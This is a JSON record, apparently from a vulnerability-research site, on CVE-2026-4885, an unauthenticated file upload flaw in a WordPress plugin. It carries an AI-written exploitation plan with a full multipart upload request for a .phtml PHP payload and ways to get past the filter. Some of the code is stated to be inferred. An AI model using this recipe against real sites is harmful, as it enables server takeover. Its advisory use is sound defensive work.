[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJwpD22EWVmZERZIq0uwBI5ZyF-j1M022h_Q23Wu8H3w":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-4885","piotnet-addons-for-elementor-pro-unauthenticated-arbitrary-file-upload-via-form-file-upload","Piotnet Addons for Elementor Pro \u003C= 7.1.70 - Unauthenticated Arbitrary File Upload via Form File Upload","The Piotnet Addons for Elementor Pro plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the 'pafe_ajax_form_builder' function in all versions up to, and including, 7.1.70. The plugin uses an incomplete extension blacklist that only blocks php, phpt, php5, php7, and exe extensions, while allowing dangerous extensions such as .phar or .phtml to be uploaded. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. 
Note: The vulnerability can only be exploited if a file field is added to the form.","piotnet-addons-for-elementor-pro",null,"\u003C=7.1.70","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-05-18 18:28:38","2026-05-19 06:46:46",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fffff2ff3-769d-4eb2-acbe-d8ce6f042581?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-4885 - Piotnet Addons for Elementor Pro\n\n## 1. Vulnerability Summary\nThe **Piotnet Addons for Elementor Pro** plugin (up to version 7.1.70) contains an unauthenticated arbitrary file upload vulnerability. The flaw exists in the `pafe_ajax_form_builder` function, which handles form submissions. While the plugin attempts to restrict file uploads, it uses an incomplete extension blacklist that fails to block executable extensions like `.phar`, `.phtml`, `.pht`, or `.php3-7`. An unauthenticated attacker can exploit this by submitting a form containing a file upload field to execute remote code on the server.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `pafe_ajax_form_builder`\n- **Method:** `POST` (multipart\u002Fform-data)\n- **Vulnerable Function:** `pafe_ajax_form_builder()`\n- **Required Parameter(s):**\n    - `action`: `pafe_ajax_form_builder`\n    - `pafe_ajax_form_builder_nonce` (or similar, inferred from common Piotnet patterns)\n    - `form_id`: The ID of the Piotnet form.\n    - `file_fields`: An array or specific key mapping to the file upload field in the form.\n- **Authentication:** None required (unauthenticated).\n- **Precondition:** A page must exist containing a Piotnet Form with at least one \"File Upload\" field.\n\n## 3. Code Flow (Inferred)\n1. 
**Entry Point:** An unauthenticated user sends a `POST` request to `admin-ajax.php` with the action `pafe_ajax_form_builder`.\n2. **Hook Registration:** The plugin registers the action via `add_action('wp_ajax_nopriv_pafe_ajax_form_builder', 'pafe_ajax_form_builder')`.\n3. **Nonce Verification:** The function likely checks a nonce passed in the request (e.g., `$_POST['nonce']`).\n4. **File Processing:** The function iterates through `$_FILES`.\n5. **Validation Failure:** It checks the file extension against a blacklist: `['php', 'phpt', 'php5', 'php7', 'exe']`.\n6. **Bypass:** Since `.phtml` or `.phar` are not in the blacklist, the validation passes.\n7. **Sink:** The file is moved to the uploads directory (likely `wp-content\u002Fuploads\u002Fpiotnet-addons-for-elementor\u002F` or a date-based WordPress folder) using `move_uploaded_file()`.\n\n## 4. Nonce Acquisition Strategy\nPiotnet Addons typically exposes nonces through localized JavaScript objects.\n1. **Identify Script:** The plugin enqueues scripts for its form builder on pages where a form is present.\n2. **Create Test Page:**\n   ```bash\n   wp post create --post_type=page --post_title=\"Piotnet Form\" --post_status=publish --post_content='[pafe-form id=\"123\"]'\n   ```\n   *(Note: The actual shortcode might vary, e.g., it might be an Elementor-embedded widget. If using Elementor, the form ID is crucial).*\n3. **Extract via Browser:**\n   Navigate to the page and use `browser_eval` to find the nonce and form configuration:\n   ```javascript\n   \u002F\u002F Common localization keys for Piotnet\n   window.pafe_form_builder_object?.nonce\n   \u002F\u002F OR\n   window.pafe_ajax_object?.nonce\n   ```\n4. **Identify Form ID:** The `form_id` is usually found in the `data-form-id` attribute of the form's HTML container.\n\n## 5. 
Exploitation Strategy\n### Step 1: Preparation\n- Create a Piotnet Form with a File Upload field.\n- Note the `form_id` and the field's `name` attribute (e.g., `form_fields[field_abcdef]`).\n\n### Step 2: Nonce Extraction\n- Navigate to the page containing the form.\n- Extract the nonce using `browser_eval`.\n\n### Step 3: Payload Delivery\nSend a multipart\u002Fform-data request to `admin-ajax.php`.\n\n**Request Mockup:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: multipart\u002Fform-data; boundary=----WebKitFormBoundaryABC123\n\n------WebKitFormBoundaryABC123\nContent-Disposition: form-data; name=\"action\"\n\npafe_ajax_form_builder\n------WebKitFormBoundaryABC123\nContent-Disposition: form-data; name=\"pafe_ajax_form_builder_nonce\"\n\n[EXTRACTED_NONCE]\n------WebKitFormBoundaryABC123\nContent-Disposition: form-data; name=\"form_id\"\n\n[FORM_ID]\n------WebKitFormBoundaryABC123\nContent-Disposition: form-data; name=\"form_fields[field_upload_id]\"; filename=\"exploit.phtml\"\nContent-Type: application\u002Foctet-stream\n\n\u003C?php echo \"VULNERABLE: \" . phpversion(); ?>\n------WebKitFormBoundaryABC123--\n```\n\n### Step 4: Execution\nThe server should respond with a JSON object indicating success and potentially the file URL. If the URL is not returned, the file is likely located in:\n`\u002Fwp-content\u002Fuploads\u002Fpiotnet-addons-for-elementor\u002F[YEAR]\u002F[MONTH]\u002Fexploit.phtml`\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `piotnet-addons-for-elementor-pro` version \u003C= 7.1.70 is active.\n2. **Create Form:** Use the `wp-cli` or Elementor editor to create a form with:\n    - Form Name: `Exploit Test`\n    - Field 1: `File Upload` (ID: `field_upload_id`)\n3. **Publish Page:** Embed this form on a new public page.\n\n## 7. 
Expected Results\n- The AJAX response should return `{\"success\":true,...}`.\n- Navigating to the uploaded `.phtml` file URL should execute the PHP code and display the PHP version.\n\n## 8. Verification Steps\n1. **Check Filesystem:**\n   ```bash\n   find \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002F -name \"exploit.phtml\"\n   ```\n2. **Confirm Execution:**\n   ```bash\n   # Use http_request to fetch the uploaded file\n   # Expected output: \"VULNERABLE: 7.4.x\" (or similar)\n   ```\n\n## 9. Alternative Approaches\n- **Extension Variation:** If `.phtml` is blocked by server-level configurations (e.g., `.htaccess`), try `.phar`, `.php3`, `.php4`, `.php5`, or `.pht`.\n- **Double Extensions:** Try `exploit.php.jpg` (if the blacklist only checks the last extension and the server is misconfigured to execute the first known extension).\n- **MIME Type Spoofing:** Change `Content-Type: application\u002Foctet-stream` to `image\u002Fjpeg` in the multipart request to bypass superficial MIME checks.","Piotnet Addons for Elementor Pro (up to 7.1.70) is vulnerable to unauthenticated arbitrary file upload due to an incomplete extension blacklist in the 'pafe_ajax_form_builder' function. 
Attackers can upload files with dangerous extensions like .phar or .phtml to execute remote code, provided the form contains a file upload field.","\u002F* Inferred from vulnerability description: pafe_ajax_form_builder function *\u002F\n\u002F\u002F The plugin checks against a blacklist:\n$blacklist = ['php', 'phpt', 'php5', 'php7', 'exe'];\n$ext = pathinfo($filename, PATHINFO_EXTENSION);\nif (in_array($ext, $blacklist)) {\n    \u002F\u002F block upload\n} else {\n    \u002F\u002F allow upload - Missing extensions like .phtml, .phar, .php3, etc.\n    move_uploaded_file($temp_file, $upload_path);\n}","--- a\u002Finc\u002Fpafe-ajax-form-builder.php\n+++ b\u002Finc\u002Fpafe-ajax-form-builder.php\n@@ -10,7 +10,14 @@\n- $blacklist = ['php', 'phpt', 'php5', 'php7', 'exe'];\n+ $allowed_extensions = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'zip', 'txt'];\n  $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));\n- if (in_array($ext, $blacklist)) {\n+ if (!in_array($ext, $allowed_extensions)) {\n    wp_send_json_error(['message' => 'Invalid file type.']);\n+   wp_die();\n  }","The exploit target is the 'pafe_ajax_form_builder' AJAX action. An unauthenticated attacker identifies a page containing a Piotnet form with a file upload field and extracts the required nonce (often localized in window.pafe_ajax_object). A multipart POST request is then sent to wp-admin\u002Fadmin-ajax.php including the action, the extracted nonce, the form ID, and a malicious payload with a bypassed extension such as .phtml or .phar. 
If successful, the file is saved to the WordPress uploads directory, where it can be executed by requesting it directly in a browser, achieving remote code execution.","gemini-3-flash-preview","2026-05-20 17:17:47","2026-05-20 17:18:13",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpiotnet-addons-for-elementor-pro\u002Ftags"]